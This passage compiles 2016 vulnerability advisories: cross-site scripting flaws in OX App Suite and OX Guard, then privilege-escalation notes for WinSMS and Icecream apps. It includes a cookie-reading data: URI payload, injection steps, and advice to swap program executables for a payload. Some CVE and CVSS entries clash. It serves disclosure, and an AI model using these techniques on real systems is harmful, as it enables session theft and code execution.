1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.
2. Proof
C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.
4. Plain Text Password Disclosure:
It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.